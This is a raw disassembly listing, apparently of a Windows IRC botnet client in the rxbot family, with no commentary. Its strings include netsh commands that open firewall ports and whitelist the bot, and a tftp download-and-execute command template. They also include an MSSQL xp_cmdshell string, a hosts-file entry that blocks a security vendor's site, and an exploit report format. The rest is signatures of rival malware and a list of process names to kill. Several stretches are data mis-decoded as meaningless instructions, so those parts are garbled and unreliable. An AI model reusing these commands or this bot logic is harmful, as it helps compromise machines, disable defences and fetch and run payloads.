a___ db '...',0 ; DATA XREF: sub_41CA82+9�o
; sub_4330A0+BF�o
asc_4476D0 db 0Dh,0Ah,0 ; DATA XREF: sub_41CB8C+A�o
; sub_425E18+FD�o
align 4
aSSS_1 db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_41CDD4+54�o
; sub_41CE4A+54�o ...
dword_4476E0 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 1732520h
; DATA XREF: sub_41CEC0+43�o
dd 0A0Dh
dword_4476F8 dd 25207325h, 73252073h, 0A0Dh ; sub_41D110+1F�o
dword_447704 dd 25207325h, 73252073h, 0D732520h, 0Ahdword_447714 dd 7C7325h off_447718 dd offset byte_4E4957 ; DATA XREF: sub_41D318+19�o
; sub_41D475+15�o ...
dword_44771C dd 257C7325h, 63257C73h, 63256325h, 0dword_44772C dd 6925h ; sub_41FE3F+1C6�o
dword_447730 dd 7Ch ; sub_41D5EF:loc_41D694�o ...
aCCCCCCCCC db '%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_41D6A6:loc_41D7BD�o
; sub_41D917+E9�o
align 4
aDCCCCCCCCC db '|%d|%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_41D6A6+107�o
align 10h
aSCCCCCCCCC db '%s%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_41D7D2:loc_41D8FA�o
align 4
aDSCCCCCCCCC db '|%d|%s%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_41D7D2+118�o
align 4
a_2d db '%.2d',0 ; DATA XREF: sub_41DA15+86�o
align 4
aP: ; DATA XREF: sub_41DA15+6F�o
; .text:0044F3A8�o
unicode 0, <P>,0
aM: ; DATA XREF: sub_41DA15+51�o
; .text:0044F3E8�o ...
unicode 0, <M>,0
aP_0 db 'P|',0 ; DATA XREF: sub_41DAC6+59�o
align 4
aM_0 db 'M|',0 ; DATA XREF: sub_41DAC6+3F�o
align 4
aSSS_2 db '%s %s -> %s',0 ; DATA XREF: sub_41DB6B+139�o
; sub_41DD09+109�o ...
aCouldnTResolve db 'Couldn',27h,'t resolve',0 ; DATA XREF: sub_41E446:loc_41E4AB�o
align 4
a90 db '90',0 ; DATA XREF: sub_41E4C1:loc_41E571�o
align 10h
a168 db '168',0 ; DATA XREF: sub_41E4C1+A2�o
a192 db '192',0 ; DATA XREF: sub_41E4C1:loc_41E557�o
a16 db '16',0 ; DATA XREF: sub_41E4C1+88�o
align 4
a172 db '172',0 ; DATA XREF: sub_41E4C1+7C�o
a10 db '10',0 ; DATA XREF: sub_41E4C1+70�o
align 4
aProccessHasTer db 'Proccess has terminated.',0Dh,0Ah,0 ; DATA XREF: sub_41E661+117�o
align 10h
aCouldNotReadDa db 'Could not read data from proccess.',0Dh,0Ah,0
; DATA XREF: sub_41E661:loc_41E74F�o
; sub_41E661:loc_41E79B�o
align 4
aSFailedToStart db '%s Failed to start IO thread, error: <%d>.',0
; DATA XREF: sub_41E7BE+19C�o
align 4
aSCmdPrompt db '%s CMD Prompt',0 ; DATA XREF: sub_41E7BE+151�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_41E7BE+2C�o
; sub_42B0E9+86�o ...
align 10h
aSystemCurren_5 db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: sub_41E96F+91�o
db 'lPolicy\DomainProfile\AuthorizedApplications\List',0
align 8
aSystemCurren_4 db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: sub_41E96F+55�o
db 'lPolicy\StandardProfile\AuthorizedApplications\List',0
align 10h
aEnabled db ':*:Enabled:',0 ; DATA XREF: sub_41E96F+25�o
aFirewallSetAll db 'firewall set allowedprogram "%s" workstation ENABLE ALL',0
; DATA XREF: sub_41EA30+138�o
aFirewallAddAll db 'firewall add allowedprogram "%s" workstation ENABLE ALL',0
; DATA XREF: sub_41EA30+10A�o
aFirewallSetP_4 db 'firewall set portopening TCP 9991 PORT2',0 ; DATA XREF: sub_41EA30+C4�o
aFirewallSetP_3 db 'firewall set portopening TCP 9999 PORT1',0 ; DATA XREF: sub_41EA30+9B�o
aFirewallSetP_2 db 'firewall set portopening TCP 1013 BS',0 ; DATA XREF: sub_41EA30+72�o
align 4
aFirewallSetP_1 db 'firewall set portopening TCP 139 NB',0 ; DATA XREF: sub_41EA30+49�o
aNetsh db 'netsh',0 ; DATA XREF: sub_41EA30+39�o
; sub_41EB9C+33�o
align 10h
aFirewallSetP_0 db 'firewall set portopening TCP 445 NB',0 ; DATA XREF: sub_41EA30+E�o
aFirewallSetPor db 'firewall set portopening TCP %d FD',0 ; DATA XREF: sub_41EB9C+15�o
align 4
aClosedI db 'closed %i',0Ah,0 ; DATA XREF: sub_41EC9D+159�o
align 4
aCloseError db 'close error',0Ah,0 ; DATA XREF: sub_41EC9D+147�o
align 8
dd offset aRxIrc ; "Rx IRC"
off_447AEC dd offset aIrc_0 ; DATA XREF: sub_41EE89+95�r
; sub_41EE89+A3�o
; "[IRC]: "
dd offset aRxIrc_c ; "Rx IRC.c"
dd offset aIrc ; "IRC//"
dd offset aPiabot ; "PiABot"
dd offset dword_44D9D8
dd offset dword_44D9CC
dd offset dword_44D9C0
dd offset dword_44D9B8
dd offset dword_44D9AC
dd offset dword_44D9A0
dd offset dword_44D990
dd offset dword_44D984
dd offset dword_44D97C
dd offset dword_44D96C
dd offset dword_44D964
dd offset dword_44D954
dd offset dword_44D94C
dd offset dword_44D940
dd offset dword_44D934
dd offset dword_44D928
dd offset dword_44D91C
dd offset dword_44D910
dd offset dword_44D900
dd offset dword_44D8F0
dd offset dword_44D8E0
dd offset aRxnzm ; "RxNZM"
dd offset dword_44D8BC
dd offset aRxnzm_b ; "RxNZM.b"
dd offset a_n_z_m_Irc_p_l ; ".n.z.m. (irc.p.l.g) .»». "
dd offset dword_44D890
dd offset dword_44D870
dd offset dword_44D864
dd offset dword_44D858
dd offset dword_44D848
dd offset dword_44D83C
dd offset dword_44D830
dd offset dword_44D824
dd offset dword_44D814
dd offset dword_44D808
dd offset dword_44D800
dd offset dword_44D7F4
dd offset dword_44D7EC
dd offset loc_44D7E0
dd offset dword_44D7D8
dd offset loc_44D7CC
dd offset dword_44D7C4
dd offset dword_44D7BC
dd offset dword_44D7B4
dd offset loc_44D7A8
dd offset aRepFtpd ; "Rep FTPd"
dd offset aReptileWelcome ; "Reptile welcomes you..."
dd offset aRep08Ftpd ; "Rep08 FTPd"
dd offset a220ReptileWelc ; "220 Reptile welcomes you..\r\n"
dd offset aRep08Main ; "Rep08 Main"
dd offset aMain_0 ; "-MAiN-"
dd offset aStnyftpd ; "StnyFtpd"
dd offset aStnyftpd0wnsJ0 ; "StnyFtpd 0wns j00"
dd offset aAgobot ; "AgoBot"
dd offset a220WelcomeToBo ; "220 \"Welcome to Bot FTP service.\"\r\n"
dd offset aPhatbot ; "PhatBot"
dd offset a220BotServerWi ; "220 Bot Server (Win32)\r\n"
dd offset aTftpget_a ; "TFTPGet.a"
dd offset aTftpISGetSS ; "tftp -i %s get %s &%s\n"
dd offset aRxTftp ; "Rx TFTP"
dd offset aTftp ; "[TFTP]"
dd offset aTftpget_b ; "TFTPGet.b"
dd offset aCmdCTftpISGetS ; "cmd /c tftp -i %s GET %s &start %s &exi"...
dd offset dword_44D65C
dd offset loc_44D650
dd offset dword_44D648
dd offset dword_44D63C
dd offset dword_44D62C
dd offset dword_44D620
dd offset dword_44D618
dd offset dword_44D60C
dd offset dword_44D604
dd offset loc_44D5F8
dd offset aC101 ; "C101"
dd offset dword_44D5E4
dd offset off_44D5E0
dd offset a3GsUT ; "3Ƀé°ÙîÙt"
dd offset aNetapi4444bind ; "Netapi4444Bind"
dd offset dword_44D5B8
dd offset off_44D5B4
dd offset dword_44D5A8
dd offset aRbot_psniff ; "rbot.psniff"
dd offset aPsniffThread ; "psniff thread"
dd offset aQ8 ; "Q8"
dd offset aWeBackLooooooo ; "We BaCk LoooooooooooOOOOOOOOOOOOOooo"
dd offset dword_44D550
dd offset dword_44D540
dd offset dword_44D530
dd offset dword_44D520
dd offset aLinkbot_dcom_b ; "Linkbot.dcom.b"
dd offset aDcom2_c ; "dcom2.c:"
dd offset aLinkbot_dcom_c ; "Linkbot.dcom.c"
dd offset aDcom2 ; "dcom2:"
dd offset aLinkbot_rpc ; "Linkbot.RPC"
dd offset aRpc_c ; "RPC.c:"
dd offset aLinkbot_shellc ; "Linkbot.Shellcode"
dd offset dword_44D4B0
dd offset aOtherbot_a ; "Otherbot.a"
dd offset aScan_start ; "scan.start"
dd offset aOtherbot_b ; "Otherbot.b"
dd offset aRoot_start ; "root.start"
dd offset aIroffer_a ; "Iroffer.a"
dd offset aHttpIroffer_or ; "http://iroffer.org/"
dd offset aIroffer_b ; "Iroffer.b"
dd offset aTotalOffered1_ ; "Total Offered: %1.1f MB Total Transfer"...
dd offset aIrofferAll ; "Iroffer-All"
dd offset aSendingYouPack ; "** Sending you pack #%i (\"%s\"), which i"...
dd offset dword_44D3C0
dd offset dword_44D3B8
dd offset aMydoom_b ; "MyDoom.B"
dd offset aFbsgjnerZvpebf ; "Fbsgjner\\Zvpebfbsg\\JNO\\JNO4\\Jno Svyr An"...
dd offset aMydoom_c ; "MyDoom.C"
dd offset aFbsgjnerZvpe_0 ; "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefv"...
dd offset aBlaster ; "Blaster"
dd offset dword_44D31C
dd offset aZotobForbotMod ; "Zotob/ForBot Mods"
dd offset aAddexExinfo ; "AddEx(exinfo)"
dd offset aWelchia_a ; "Welchia.a"
dd offset aRpcpatch_mutex ; "RpcPatch_Mutex"
dd offset dword_44D2D0
dd offset dword_44D31C
dd offset dword_44D2C4
dd offset dword_44D2B0
dd offset aChangehosts ; "ChangeHosts"
dd offset a127_0_0_1Www_s ; "\n127.0.0.1\twww.symantec.com\n"
dd offset dword_44D274
dd offset dword_44D268
dd offset dword_44D260
dd offset dword_44D24C
dd offset aPnp_b ; "PNP.b"
dd offset a8d9f4e40A03d11 ; "8d9f4e40-a03d-11ce-8f69-08003e30051b"
dd offset aMssql_a ; "MSSQL.A"
dd offset aThcthcthcthcth ; "THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC"...
dd offset aMssql_b ; "MSSQL.B"
dd offset aExecMaster__xp ; "EXEC master..xp_cmdshell"
dd offset aWebdav ; "WebDav"
dd offset loc_44D1A8
dd offset aRxMain ; "Rx Main"
dd offset aMain ; "[MAIN]: "
dd offset aIis5ssl ; "IIS5SSL"
dd offset byte_44D17C
dd offset aVncscan ; "VNCScan"
dd offset aSystemrootSyst ; "%systemroot%\\system32\\cmd.exe"
dd offset aNetdevil ; "NetDevil"
dd offset aPleaz_runS ; "pleaz_run%s"
dd offset aOptix ; "Optix"
dd offset a022moptestmv1_ ; "022¬OPtest¬v1.1\r\n"
dd offset loc_44D113+5
dd offset loc_44D10F+1
dd offset aOld4444shell ; "Old4444Shell"
dd offset loc_44D0F4
dd offset dword_44D0E8
dd offset dword_44D0D4
dd offset dword_44D0C4
dd offset loc_44D0B0
dd offset dword_44D0A0
dd offset loc_44D08C
dd offset dword_44D07C
dd offset dword_44D068
dd offset dword_44D05C
dd offset loc_44D044
dd offset aBobic_a ; "Bobic.A"
dd offset aOsamaBinLadenC ; "Osama Bin Laden Captured."
dd offset aBobic_b ; "Bobic.B"
dd offset aDonateToTheHur ; "Donate to the Hurricane Katrina relief "...
dd offset aBeagle ; "Beagle"
dd offset dword_44CFCC
dd offset aMsblast ; "MsBlast"
dd offset aWindowsupdate_ ; "windowsupdate.com"
dd offset aLowerzones ; "LowerZones"
dd offset aSoftwareMicr_6 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd offset aHiderGui ; "Hider-Gui"
dd offset aSoftwareAdrian ; "Software\\Adrian Lopez\\HideWindow\\Prefer"...
dd offset aHiderun ; "HideRun"
dd offset aHiderunHiddenA ; "HideRun -- hidden application launcher."...
dd offset aR57 ; "r57"
dd offset aI2luy2x1zgugph ; "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA"...
dd offset aC99 ; "c99"
dd offset aR0lgodlhfaauak ; "R0lGODlhFAAUAKIAAAAAAP//////93d3cDAwIaG"...
dd offset aDcomOldScan ; "Dcom-Old-Scan"
dd offset aPipeEpmapper ; "pipe\\epmapper\\"
dd offset aNircomline ; "NirComLine"
dd offset aNircomline ; "NirComLine"
dd offset aMsnbot_a ; "MSNBot.a"
dd offset aStaticConstCha ; "static const char *msg_english[] = {"
dd offset aMsnbot_b ; "MSNBot.b"
dd offset aImportMsnMsnme ; "#import \"MSN/MSNMessengerAPI.tlb\" named"...
dd offset aFu_rootkit_a ; "FU.Rootkit.a"
; ---------------------------------------------------------------------------
aam 0CCh
inc esp
add ah, al
int 3 ; Trap to Debugger
inc esp
add [esp+ecx*8-3383FFBCh], cl
inc esp
add [esp+ecx*8+44h], cl
add [eax], bh
int 3 ; Trap to Debugger
inc esp
add [eax-6BFFBB35h], ah
retf
; ---------------------------------------------------------------------------
dw 44h
; ---------------------------------------------------------------------------
mov bl, cl
inc esp
add [ebx+ecx*8+44h], bh
add [ebx+ecx*8+44h], ch
add [ebx+ecx*8+44h], dl
add [eax], ch
retf
; ---------------------------------------------------------------------------
dw 44h
; ---------------------------------------------------------------------------
sbb al, 0CBh
inc esp
add al, dl
retf 44h
; ---------------------------------------------------------------------------
dd offset aFiredaemon_a ; "FireDaemon.A"
dd offset aCopyrightC2007 ; "Copyright (c) 2007 FireDaemon Technolog"...
dd offset aFiredaemon_b ; "FireDaemon.B"
; ---------------------------------------------------------------------------
pusha
retf 44h
; ---------------------------------------------------------------------------
push eax
retf 44h
; ---------------------------------------------------------------------------
dd offset loc_44CA3C
dd offset aNtbot_a ; "NTBot.A"
dd offset aStaticConstUns ; "static const unsigned long crc32tab[256"...
dd offset aNtbot_b ; "NTBot.B"
dd offset aExploitingSUse ; "(Exploiting: %s User: %s / Pass: %s\r\n)"
dd offset dword_44C9C8
dd offset dword_44C9A4
dd offset dword_44C998
dd offset dword_44C980
dd 2 dup(0)
off_447E68 dd offset a_tmp_exe_0 ; DATA XREF: sub_41F0F5+1FE�r
; sub_41F0F5+274�r
; "*.tmp.exe"
dd offset a_tmp_exe ; "*.TMP.EXE"
dd offset aEraseme_exe_1 ; "eraseme*.exe"
dd offset aEraseme_exe_0 ; "ERASEME*.EXE"
dd offset aSsms_exe ; "ssms.exe"
dd offset aMsile_exe ; "msile.exe"
dd offset aWorm32_exe_0 ; "worm32.exe"
dd offset aPenis_exe ; "penis.exe"
dd offset aPenis32_exe_0 ; "penis32.exe"
dd offset aMsblast_exe_0 ; "msblast.exe"
dd offset aKernel32_exe_0 ; "kernel32.exe"
dd offset aSvhost_exe_0 ; "svhost.exe"
; ---------------------------------------------------------------------------
fmul st, st
inc esp
add al, dl
enter 44h, 0C4h
enter 44h, 0B8h
enter 44h, 0ACh
enter 44h, 9Ch
enter 44h, 90h
enter 44h, 84h
enter 44h, 74h
enter 44h, 64h
enter 44h, 58h
enter 44h, 4Ch
enter 44h, 40h
enter 44h, 34h
enter 44h, 28h
enter 44h, 20h
enter 44h, 14h
enter 44h, 8
enter 44h, 0FCh
mov dword ptr [eax+eax-10h], 0E80044C7h
mov dword ptr [eax+eax-24h], 0CC0044C7h
mov dword ptr [eax+eax-40h], 940044C7h
mov dword ptr [eax+eax-78h], 7C0044C7h
mov dword ptr [eax+eax+70h], 600044C7h
mov dword ptr [eax+eax+50h], 400044C7h
mov dword ptr [eax+eax+30h], 200044C7h
mov dword ptr [eax+eax+14h], 80044C7h
mov dword ptr [eax+eax-4], 0F00044C6h
mov byte ptr [eax+eax-18h], 0C6h
inc esp
add al, bl
mov byte ptr [eax+eax-38h], 0C6h
inc esp
add [esi+eax*8-3953FFBCh], bh
inc esp
add [esi+eax*8-3973FFBCh], bl
inc esp
add [esi+eax*8-3987FFBCh], al
inc esp
add [esi+eax*8+44h], ch
add [eax-3Ah], ah
inc esp
add [eax-3Ah], dl
inc esp
add [esi+eax*8+44h], al
add [eax], bh
mov byte ptr [eax+eax+2Ch], 0C6h
inc esp
add [eax], ah
mov byte ptr [eax+eax+18h], 0C6h
inc esp
add [eax], dl
mov byte ptr [eax+eax+4], 0C6h
inc esp
add al, bh
lds eax, [eax+eax-18h]
lds eax, [eax+eax-24h]
lds eax, [eax+eax-30h]
lds eax, [eax+eax-40h]
lds eax, [eax+eax-4Ch]
lds eax, [eax+eax-5Ch]
lds eax, [eax+eax-68h]
lds eax, [eax+eax-74h]
lds eax, [eax+eax-80h]
lds eax, [eax+eax+78h]
lds eax, [eax+eax+6Ch]
lds eax, [eax+eax+5Ch]
lds eax, [eax+eax+4Ch]
lds eax, [eax+eax+40h]
lds eax, [eax+eax+34h]
lds eax, [eax+eax+28h]
lds eax, [eax+eax+18h]
lds eax, [eax+eax+0Ch]
lds eax, [eax+eax+0]
lds eax, [eax+eax-0Ch]
les eax, [eax+eax-18h]
les eax, [eax+eax-28h]
les eax, [eax+eax-38h]
les eax, [eax+eax-44h]
les eax, [eax+eax-4Ch]
loc_447FDD: ; CODE XREF: .text:00448018�j
les eax, [eax+eax-58h]
les eax, [eax+eax-64h]
les eax, [eax+eax-70h]
les eax, [eax+eax-7Ch]
les eax, [eax+eax+78h]
les eax, [eax+eax+68h]
les eax, [eax+eax+58h]
les eax, [eax+eax+4Ch]
les eax, [eax+eax+3Ch]
les eax, [eax+eax+2Ch]
les eax, [eax+eax+1Ch]
les eax, [eax+eax+0Ch]
les eax, [eax+eax-4]
retn
; ---------------------------------------------------------------------------
dw 44h
dd offset aWintask32_exe ; "WINTASK32.EXE"
; ---------------------------------------------------------------------------
loopne loc_447FDD
inc esp
add al, dl
retn
; ---------------------------------------------------------------------------
dw 44h
; ---------------------------------------------------------------------------
rol bl, 44h
add [ebx+eax*8-3C57FFBCh], dh
inc esp
add [ebx+eax*8-3C77FFBCh], dl
inc esp
add [eax-3Dh], bh
inc esp
add [ebx+eax*8+44h], ch
add [eax-3Dh], ah
inc esp
add [eax-3Dh], dl
inc esp
add [eax-3Dh], al
inc esp
add [ebx+eax*8], dh
inc esp
add [ebx+eax*8], ah
inc esp
add [eax], bl
retn
; ---------------------------------------------------------------------------
dw 44h
dd offset aMsJava_exe ; "MS-JAVA.EXE"
dd offset aMsjava_exe ; "MSJAVA.EXE"
dd offset aMsupsrv_exe ; "MSUPSRV.EXE"
dd offset aMsusb_exe ; "MSUSB.EXE"
; ---------------------------------------------------------------------------
fadd st, st(2)
inc esp
add ah, cl
retn 44h
; ---------------------------------------------------------------------------
rol dl, 44h
add [edx+eax*8-3D5BFFBCh], dh
inc esp
add [eax-77FFBB3Eh], bl
retn 44h
; ---------------------------------------------------------------------------
dd offset aDmloader_exe ; "DMLOADER.EXE"
; ---------------------------------------------------------------------------
push 5C0044C2h
retn 44h
; ---------------------------------------------------------------------------
dd offset aDpnwsock_exe ; "DPNWSOCK.EXE"
; ---------------------------------------------------------------------------
inc eax
retn 44h
; ---------------------------------------------------------------------------
xor al, 0C2h
inc esp
add [eax], ch
retn 44h
; ---------------------------------------------------------------------------
sbb al, 0C2h
inc esp
add [eax], dl
retn 44h
; ---------------------------------------------------------------------------
dd offset aBingo_exe ; "BINGO.EXE"
dd offset aWks_exe ; "WKS.EXE"
dd offset aSvhostcs32_exe ; "SVHOSTCS32.EXE"
dd offset aNtsf_exe ; "NTSF.EXE"
dd offset aSpoolss_exe ; "SPOOLSS.EXE"
dd offset aMysvcc_exe ; "MYSVCC.EXE"
dd offset aSerrv_exe ; "SERRV.EXE"
dd offset aWinsys_32_exe ; "WINSYS_32.EXE"
dd offset aSserrvv_exe ; "SSERRVV.EXE"
dd offset aWinsockx32_exe ; "WINSOCKX32.EXE"
dd offset aNetmsn_exe ; "NETMSN.EXE"
dd offset aMsdevelop_exe ; "MSDEVELOP.EXE"
dd offset aLsass32_exe ; "LSASS32.EXE"
dd offset aWinrpc_exe ; "WINRPC.EXE"
dd offset aSys_exe ; "SYS.EXE"
dd offset aWinupd_exe ; "WINUPD.EXE"
dd offset aSyser_exe ; "SYSER.EXE"
dd offset aAkwid_exe ; "AKWID.EXE"
dd offset aAk_exe ; "AK.EXE"
dd offset aWinl0gon_exe ; "WINL0GON.EXE"
dd offset aWinl0gin_exe ; "WINL0GIN.EXE"
dd offset aWinlogon32_exe ; "WINLOGON32.EXE"
dd offset aYesbron_com ; "YESBRON.COM"
dd offset aMsmpls_exe ; "MSMPLS.EXE"
dd offset aMsnplus_exe ; "MSNPLUS.EXE"
dd offset aTmrservice_exe ; "TMRSERVICE.EXE"
dd offset aInstall_sp_exe ; "INSTALL_SP.EXE"
dd offset aAlg32_exe ; "ALG32.EXE"
dd offset aMsnupdate_exe ; "MSNUPDATE.EXE"
dd offset aMsnupdater_exe ; "MSNUPDATER.EXE"
dd offset aMsner_exe ; "MSNER.EXE"
dd offset aMsmmsgr_exe ; "MSMMSGR.EXE"
dd offset aMsnmsgrr_exe ; "MSNMSGRR.EXE"
dd offset aSpoolv_exe ; "SPOOLV.EXE"
dd offset aSpoolvs_exe ; "SPOOLVS.EXE"
dd offset aKernel32_exe ; "KERNEL32.EXE"
dd offset aSssvhost_exe ; "SSSVHOST.EXE"
dd offset aLsass_32_exe ; "LSASS_32.EXE"
dd offset aIiexplore_exe ; "IIEXPLORE.EXE"
dd offset aIiexplorer_exe ; "IIEXPLORER.EXE"
dd offset aAsn1sys_exe ; "ASN1SYS.EXE"
dd offset aWgareg_exe ; "WGAREG.EXE"
dd offset aServices32_exe ; "SERVICES32.EXE"
dd offset aMicrosoft_exe ; "MICROSOFT.EXE"
dd offset aLinewsrv_exe ; "LINEWSRV.EXE"
dd offset aWinime_exe ; "WINIME.EXE"
dd offset aWservice_exe ; "WSERVICE.EXE"
dd offset aWservices_exe ; "WSERVICES.EXE"
dd offset aScsrc_exe ; "SCSRC.EXE"
dd offset aWinsvc_exe ; "WINSVC.EXE"
dd offset aWin32update_ex ; "WIN32UPDATE.EXE"
dd offset aDnssrv_exe ; "DNSSRV.EXE"
dd offset aDnssvc_exe ; "DNSSVC.EXE"
dd offset aDns32_exerxbot ; "DNS32.EXERXBOT.EXE"
dd offset aCrxbot_exe ; "CRXBOT.EXE"
dd offset aBot_exe ; "BOT.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aW32gen_exe ; "W32GEN.EXE"
dd offset aTaskmngr32_exe ; "TASKMNGR32.EXE"
dd offset aIe6_exe ; "IE6.EXE"
dd offset aIe7_exe ; "IE7.EXE"
dd offset aPapersrv_exe ; "PAPERSRV.EXE"
dd offset aTskmgr_exe ; "TSKMGR.EXE"
dd offset aNdrv_exe ; "NDRV.EXE"
dd offset aMshtml_exe ; "MSHTML.EXE"
dd offset aMshtml1_exe ; "MSHTML1.EXE"
dd offset aMshtml2_exe ; "MSHTML2.EXE"
dd offset aMshtml3_exe ; "MSHTML3.EXE"
dd offset aCtxad_exe ; "CTXAD.EXE"
dd offset aRundii32_exe ; "RUNDII32.EXE"
dd offset aPopwin_exe ; "POPWIN.EXE"
dd offset aMsserrv32_exe ; "MSSERRV32.EXE"
dd offset aMsserv32_exe ; "MSSERV32.EXE"
dd offset aRundll16_exe ; "RUNDLL16.EXE"
dd offset aMathchk_exe ; "MATHCHK.EXE"
dd offset aPicx_exe ; "PICX.EXE"
dd offset aSuhoy_exe ; "SUHOY.EXE"
dd offset aWinupdates_exe ; "WINUPDATES.EXE"
dd offset aMsmgrxp_exe ; "MSMGRXP.EXE"
dd offset aRpc32_exe ; "RPC32.EXE"
dd offset aSystra_exe ; "SYSTRA.EXE"
dd offset aSyscfg16_exe ; "SYSCFG16.EXE"
dd offset aSyscfg32_exe ; "SYSCFG32.EXE"
dd offset aWincfg32_exe ; "WINCFG32.EXE"
dd offset aTaskgmr_exe ; "TASKGMR.EXE"
dd offset aTaskm0n_exe ; "TASKM0N.EXE"
dd offset aWfdmgr_exe ; "WFDMGR.EXE"
dd offset aXpfirewall_exe ; "XPFIREWALL.EXE"
dd offset aMsnmsgs_exe ; "MSNMSGS.EXE"
dd offset aMsnmsg_exe ; "MSNMSG.EXE"
dd offset aWinis_exe ; "WINIS.EXE"
dd offset aWin32_exe ; "WIN32.EXE"
dd offset aWin_exe ; "WIN.EXE"
dd offset aCmrss_dll_exe ; "CMRSS.DLL.EXE"
dd offset aWinnamps_exe ; "WINNAMPS.EXE"
dd offset aWinb_exe ; "WINB.EXE"
dd offset aMydocs_exe ; "MYDOCS.EXE"
dd offset aWinmap_exe ; "WINMAP.EXE"
dd offset aSvcshoter_exe ; "SVCSHOTER.EXE"
dd offset aWups_exe ; "WUPS.EXE"
dd offset aSaveuninst_exe ; "SAVEUNINST.EXE"
dd offset aWindows_exe ; "WINDOWS.EXE"
dd offset aWindow_exe ; "WINDOW.EXE"
dd offset aW32_exe ; "W32.EXE"
dd offset aSystem_exe ; "SYSTEM.EXE"
dd offset aSystem32_exe ; "SYSTEM32.EXE"
dd offset aWinsystem_exe ; "WINSYSTEM.EXE"
dd offset aWinrarx_exe ; "WINRARX.EXE"
dd offset aWindowsp_exe ; "WINDOWSP.EXE"
dd offset aHiddenrun_exe ; "HIDDENRUN.EXE"
dd offset aHidden32_exe ; "HIDDEN32.EXE"
dd offset aHidden_exe ; "HIDDEN.EXE"
dd offset aHide_exe ; "HIDE.EXE"
dd offset aWinpadg_exe ; "WINPADG.EXE"
dd offset aMsgmr_exe ; "MSGMR.EXE"
dd offset aMsgm_exe ; "MSGM.EXE"
dd offset aFunny_pic_scr ; "FUNNY_PIC.SCR"
dd offset aHellmsn_exe ; "HELLMSN.EXE"
dd offset aMyt0b_exe ; "MYT0B.EXE"
dd offset aMybot_exe ; "MYBOT.EXE"
dd offset a666_exe ; "666.EXE"
dd offset aWip_exe ; "WIP.EXE"
dd offset aMsnlive_exe ; "MSNLIVE.EXE"
dd offset aService_exe ; "SERVICE.EXE"
dd offset aMs_exe ; "MS.EXE"
; ---------------------------------------------------------------------------
add al, 0C6h
inc esp
add al, ah
mov ebx, 0BBD40044h
inc esp
add al, cl
mov ebx, 0BBBC0044h
inc esp
add [eax-5BFFBB45h], dh
mov ebx, 0BB980044h
inc esp
add [eax+7C0044BBh], cl
mov ebx, 0BB700044h
inc esp
add [ebx+edi*4+44h], ah
add [eax-45h], bl
inc esp
add [ebx+edi*4+44h], cl
add ah, dh
retn 44h
; ---------------------------------------------------------------------------
dd offset aWinsys_exe ; "WINSYS.EXE"
dd offset aWinz_exe ; "WINZ.EXE"
dd offset aXml_exe ; "XML.EXE"
dd offset aXml32_exe ; "XML32.EXE"
dd offset aLansas_exe ; "LANSAS.EXE"
dd offset aWuamgr_exe ; "WUAMGR.EXE"
dd offset aWuamgrd_exe ; "WUAMGRD.EXE"
dd offset aWuamgrd3_exe ; "WUAMGRD3.EXE"
dd offset aIpcmgr_exe ; "IPCMGR.EXE"
dd offset aWinsock_exe ; "WINSOCK.EXE"
dd offset aWinspooler_exe ; "WINSPOOLER.EXE"
dd offset aWinusb_exe ; "WINUSB.EXE"
dd offset aWinusb32_exe ; "WINUSB32.EXE"
dd offset aSvcost_exe ; "SVCOST.EXE"
dd offset aSys_xp_exe ; "SYS_XP.EXE"
dd offset aIrun4_exe ; "IRUN4.EXE"
dd offset aNttdll_exe ; "NTTDLL.EXE"
dd offset aWinhelp_exe_0 ; "WINHELP.EXE"
dd offset aSpoolmgr_exe ; "SPOOLMGR.EXE"
dd offset aServicesmsi_ex ; "SERVICESMSI.EXE"
dd offset aUpdat_exe ; "UPDAT.EXE"
dd offset aSvvosts_exe ; "SVVOSTS.EXE"
dd offset aDsrss_exe ; "DSRSS.EXE"
dd offset aIeserver_exe ; "IESERVER.EXE"
dd offset aVhost_exe ; "VHOST.EXE"
dd offset aSsate_exe ; "SSATE.EXE"
dd offset aBeagle_exe ; "BEAGLE.EXE"
dd offset aBbeagle_exe ; "BBEAGLE.EXE"
; ---------------------------------------------------------------------------
fdivr dword ptr [ecx-4637FFBCh]
inc esp
add [eax-57FFBB47h], bh
mov ecx, 0B99C0044h
inc esp
add [eax-7BFFBB47h], dl
mov ecx, 0B9780044h
inc esp
add [ecx+edi*4+44h], ch
add [eax-47h], ah
inc esp
add [ecx+edi*4+44h], dl
add [ecx+edi*4+44h], cl
add [eax-47h], al
inc esp
add [eax], dh
mov ecx, 0C41C0044h
inc esp
add [eax], ah
mov ecx, 0B9140044h
inc esp
add [eax], cl
mov ecx, 0B8F80044h
inc esp
add al, ch
mov eax, 0B8DC0044h
inc esp
add ah, dl
mov eax, 0B8C40044h
inc esp
add [eax+edi*4-4753FFBCh], dh
inc esp
add [eax-6BFFBB48h], ah
mov eax, 0B8840044h
inc esp
add [eax-48h], bh
inc esp
add [eax+edi*4+44h], ch
add [eax-48h], ah
inc esp
add [eax-48h], dl
inc esp
add [eax-3Fh], bl
inc esp
add [eax-48h], al
inc esp
add [eax], dh
mov eax, 0B8240044h
inc esp
add ah, cl
retn 44h
; ---------------------------------------------------------------------------
dd offset aIsmini_exe ; "ISMINI.EXE"
dd offset aIshost_exe ; "ISHOST.EXE"
dd offset aMssdev_exe ; "MSSDEV.EXE"
dd offset aIi_exe ; "II.EXE"
dd offset aNewbot_exe ; "NEWBOT.EXE"
dd offset aSchost_exe ; "SCHOST.EXE"
dd offset aWindowantasdiv ; "WINDOWANTASDIVRI.EXE"
dd offset aCtfmom_exe ; "CTFMOM.EXE"
dd offset aRecsl_exe ; "RECSL.EXE"
dd offset aInternet_exe ; "INTERNET.EXE"
dd offset aWinlogin_exe ; "WINLOGIN.EXE"
